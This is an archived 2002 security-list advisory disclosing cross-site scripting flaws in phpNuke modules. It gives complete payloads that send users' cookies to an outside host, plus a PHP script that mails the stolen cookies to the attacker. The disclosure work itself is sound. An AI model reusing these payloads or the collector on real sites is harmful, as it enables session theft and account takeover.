Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

From: Matthew Murphy (mattmurphyat_private)
Date: Sun Nov 24 2002 - 10:06:23 PST

Next message: Dave Ahmad: "ISS Security Brief: Solaris fs.auto Remote Compromise Vulnerability (fwd)"

Previous message: Matthew Murphy: "acFTP Authentication Issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

phpNuke Module Vulnerabilities Enable Identity Theft

Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
Risk: High
Impact: Identity Theft/Impersonation/Privilege Elevation
Scenario: Cross-site scripting flaws enabling cookie theft

Description

phpNuke is a popular, and very complex content manager that runs on Unix,
Mac, and Windows systems with a MySQL or similar backend database.  Many of
the content manager's modules contain serious vulnerabilities that allow
attackers to hijack or disable user accounts, and possibly gain
administrative privileges.  Gaining such privileges could likely assist
further compromise of the susceptible system.

I. Search Module Vulnerability

The search module of phpNuke applies absolutely no filtering at all when
returning the "Results for x..." page, and as a result is susceptible to
cross-site scripting via a simple query such as:

<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurph
yat_private&ref="+document.URL+"cookie="+document.cookie;

II. Multiple Module Extended Tag Vulnerabilities

phpNuke does a decent job of stripping known malicious tags, but doesn't
take into account the fact that even "safe" tags can have malicious
properties.  This enables cross-site scripting against the PM module,
Discussion module, News module, etc. so basically any module that accepts
user input for an article, message, or comment, can be attacked with HTML
such as:

<B
STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fet
ch.php?email=mattmurphyat_private&ref=\'+document.URL+\'cookie=\'+document.c
ookie'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurp
hyat_private&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>
<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=matt
murphyat_private&ref='+document.URL+'cookie='+document.cookie">Keep
Away!</B>

III. Exploit Script

<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>

Vendor Response

I've contacted www.phpnuke.org through a private message, but if anyone
knows a more reliable contact for them, please do use it, as this is not
likely the only route of contact.  I sent a PM to "nukelite" with an example
exploit in it.  I expect that future BETA releases will eliminate this
vulnerability.  I am submitting this to the list so that vulnerable
administrators may make the necessary revisions to prevent this
vulnerability.  The versions available for download on www.phpnuke.org as
well as the version deployed there, remains vulnerable at the time of this
writing.

Next message: Dave Ahmad: "ISS Security Brief: Solaris fs.auto Remote Compromise Vulnerability (fwd)"
Previous message: Matthew Murphy: "acFTP Authentication Issue"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Nov 25 2002 - 19:59:36 PST